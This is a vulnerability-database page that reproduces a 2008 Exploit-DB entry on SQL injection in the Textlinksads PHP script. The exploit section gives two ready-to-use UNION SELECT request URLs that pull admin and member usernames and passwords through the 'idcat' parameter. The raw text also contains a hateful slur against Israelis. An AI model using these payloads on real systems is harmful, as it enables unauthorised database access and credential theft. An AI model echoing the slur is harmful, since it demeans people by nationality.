Textlinksads Exploit

vendor:

Textlinksads

by:

Cyb3r-1sT

CVSS

HIGH

SQL Injection

CWE

Product Name: Textlinksads

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

The vulnerability exists due to insufficient sanitization of user-supplied input in the 'idcat' parameter of the 'index.php' script. A remote attacker can send a specially crafted request to the vulnerable script and execute arbitrary SQL commands in application's database. This can be exploited to bypass authentication and gain access to the administrative panel or to steal sensitive information from the database.

Mitigation:

Input validation should be used to prevent SQL injection attacks.

Source

Exploit-DB raw data:

                         ||          ||   | ||        
                  o_,_7 _||  . _o_7 _|| 4_|_||  o_w_, 
                 ( :   /    (_)    /           (   .  
                  ==================================
                     ============================
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
|     _                   __           __       __          ______     |
|   /' \            __  /'__`\        /\ \__  /'__`\       /\  ___\    |
|  /\_, \    ___   /\_\/\_\L\ \    ___\ \ ,_\/\ \/\ \  _ __\ \ \__/    |
|  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\ \___``\  |
|     \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ |
|      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\  \ \____/ |
|       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/   \/___/  |
|                  \ \____/ >> Kings of injection                      |
|                   \/___/                                             |
|                                                                      |
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|


<<!>> Found by  :  Cyb3r-1sT

<<!>> C0ntact :  t3tto0 [at] yahoo.com

                 cyb3r-1st [at] hotmail.com

<<!>> Groups : InjEctOr5 T3am 


=======================================================
+++++++++++++ R3membeR Kings of injection ++++++++++++++
=======================================================


<<->> script   : textlinksads

<<->> download : www.hispah.com/demos/textlinksads 


=======================================================
++++++++++++++++ pwning israel fuckers ++++++++++++++++
=======================================================


<<->> D0rk    : find it

<<->> Exploit :>>>>>>>>>

          <!> for admin inf0 ::: 
       >>>>>>>>>>>>>>>>>>>>>>>> www.site.me/index.php?action=buy&idcat=9999999'+union+select+0,concat(username,0x3a,password)+from+admin_detail/*

        <!> for members inf0 ::: 
       >>>>>>>>>>>>>>>>>>>>>>>> www.site.me/index.php?action=buy&idcat=9999999'+union+select+0,concat(username,0x3a,password)+from+reguser/*


=======================================================
+++++++++++++++++++++++ Greetz ++++++++++++++++++++++++
=======================================================


<<->> My best freinds :: titanichacker $ arb-hawk $ denm0 $ drbaka  $ nicehacker 
                          anaconda-ksa $ sirus $ crazy-x $ spk  and all freinds

<<->> InjEctOr5 TeaM  


<<->> All muslims

# milw0rm.com [2008-10-08]